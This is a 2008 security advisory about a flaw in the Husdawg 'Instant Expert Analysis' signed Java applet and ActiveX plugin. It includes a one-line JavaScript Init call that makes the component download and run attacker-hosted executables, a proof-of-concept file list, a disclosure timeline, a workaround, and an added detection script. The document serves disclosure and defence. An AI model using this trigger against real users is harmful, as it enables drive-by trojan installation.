Instant Expert Analysis is "a patent-pending technology that allows websites to have a one-click method for rapidly analyzing a user's hardware and software. The results are then instantaneously compared to a comprehensive database of requirements".
Instant Expert Analysis has been proven effective by millions of users on sites run by NVIDIA, Activision, Electronic Arts UK, Eidos, CNET, IGN, and AMD.
Instant Expert Analysis uses a signed Java applet for Firefox or Netscape browsers and a signed ActiveX plugin for Internet Explorer. Both applets allow an attacker to download and execute arbitrary applications when the user visits an infected website. If the user already accepted the applet on a valid site, no user interaction is needed to perform this attack! Because the applets are signed by a trusted source, the browser's default behavior is to ask only the first time.
The Init method of sysreqlab2.jar or sysreqlab2.cab can be called from JavaScript as in the following example: document.SysReqLab.Init("http://www.example.com", "abc");
The applet then downloads and executes a DLL file from http://www.systemrequirementslab.com.
The DLL file loads a setup_abc.exe, a setup_mz_abc.exe, or a setup_ie_abc.exe from the location that was passed to the Init method (e.g. the attacker's website) and executes it.
Proof of concept:
The attacker can serve the following files from any host:
setup_abc.exe
setup_ie_abc.exe
setup_mz_abc.exe
sysreqlab2.cab
sysreqlab2.jar
exploit.html
The setup_*.exe files are the trojan applications.
Vendor contact timeline:
2008-05-08: Vulnerability information sent to vendor (jhussey@husdawg.com)
2008-06-20: We were informed that the main component had been updated and that a kill bit process had been initiated with Microsoft.
2008-08-13: Received e-mail from the vendor that a case has been opened by Microsoft.
2008-10-13: SEC Consult requests an update from Husdawg on how the kill bit process is going and informs Husdawg that a public advisory will be released on October 20th 2008.
2008-10-14: A US-CERT vulnerability note is released, crediting Andre Protas of eEye Digital Security and Greg Linares. SEC Consult was not notified in advance of the release and has not been credited by the vendor or other parties involved.
Workaround:
Block the ActiveX plugin from "Husdawg, LLC" and don't run it.
Remove the "Husdawg, LLC" certificate for the Java applet from Control Panel / Java / Security / Certificates / Trusted Certificates and don't allow the applet to run.
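A complementary check for a web proxy or content filter, added here as an example (it is not part of the original advisory or the vendor's code): it scans page source for the Init call described above and flags calls whose first argument points at a host outside an allowlist. The function name findSuspiciousInit, the contents of ALLOWED_HOSTS and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: flag pages that call the SysReqLab Init method with a
// download base URL outside an operator-defined allowlist.
// ALLOWED_HOSTS is an assumption; populate it with hosts you trust.
const ALLOWED_HOSTS = new Set(["www.systemrequirementslab.com"]);

// Matches <object>.Init("<url>", "<id>") with single or double quotes.
const INIT_CALL = /\.Init\s*\(\s*(["'])(.*?)\1\s*,\s*(["'])(.*?)\3\s*\)/g;

function findSuspiciousInit(html) {
  const findings = [];
  // Only inspect pages that reference the component at all.
  if (!/sysreqlab/i.test(html)) return findings;
  for (const m of html.matchAll(INIT_CALL)) {
    const [, , rawUrl, , id] = m;
    let host = null;
    try {
      host = new URL(rawUrl).hostname.toLowerCase();
    } catch (e) {
      // Relative or unparseable URL: keep host null and report it.
    }
    if (host === null || !ALLOWED_HOSTS.has(host)) {
      findings.push({
        url: rawUrl,
        host,
        id,
        // File names the advisory says are fetched from that base URL.
        fetched: ["setup_", "setup_mz_", "setup_ie_"].map(p => `${p}${id}.exe`),
      });
    }
  }
  return findings;
}

// Constructed sample pages (not captured traffic).
const allowedPage = `<object id="SysReqLab"></object><script>
document.SysReqLab.Init("http://www.systemrequirementslab.com", "abc");</script>`;
const flaggedPage = `<object id="SysReqLab"></object><script>
document.SysReqLab.Init('http://www.example.com', "abc");</script>`;

console.log(findSuspiciousInit(allowedPage));
console.log(findSuspiciousInit(flaggedPage));
```

This is a coarse static filter: calls that are obfuscated or assembled at run time will not match, so it supplements the workaround above and does not replace it.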